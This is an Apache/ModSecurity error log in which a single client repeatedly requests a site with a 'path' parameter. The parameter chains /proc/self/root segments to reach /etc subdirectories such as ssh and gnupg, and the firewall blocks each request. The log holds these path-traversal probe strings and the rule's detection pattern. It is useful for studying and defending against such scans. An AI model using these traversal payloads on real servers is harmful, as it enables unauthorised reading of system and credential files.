[Mon Mar 16 10:07:30.637214 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:41918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAkv9ocpUE4ed4uDzeYQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:31.926900 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:41924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAk7ysWC90G-1nBrA13AAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:33.220278 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:41934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAlZqj1wV0Si-OkefaKAAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:34.554890 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:41946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAlrABkC4fWIHEf8HbdQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:35.725528 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.241.46:41952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAlwlT9VtDQc7bgUycxAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:37.040836 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.241.46:41964] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAmRXjF1vJNtV6CWrqLAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:38.206426 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.241.46:41596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAmhXjF1vJNtV6CWrqLgAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:42.901504 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:41598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAnv9ocpUE4ed4uDzeaAAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:44.203077 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:41610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAoJqj1wV0Si-OkefaKwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:45.383297 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:41622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAobysWC90G-1nBrA13wAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:46.645481 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.241.46:41626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAoglT9VtDQc7bgUyczgAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:47.884641 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:41628] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAo5qj1wV0Si-OkefaLgAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:49.193977 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:40552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgApdSswJuvopo3lOhRGAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:50.507316 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:40558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAprysWC90G-1nBrA14AAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:52.181573 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.241.46:40570] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAp3jZBu2q05ozVU9GygAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:53.877365 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:40578] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAqf9ocpUE4ed4uDzeaQAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:55.191852 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:40582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAq9SswJuvopo3lOhRGQAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:56.511820 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:40598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgArJqj1wV0Si-OkefaMAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:58.695156 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:40608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgArpqj1wV0Si-OkefaMgAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:59.669164 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:56964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAr3jZBu2q05ozVU9G0gAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:08:00.114723 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.241.46:38782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAsHjZBu2q05ozVU9G0wAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:08:03.626562 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.241.46:38784] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAs5qj1wV0Si-OkefaNgAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
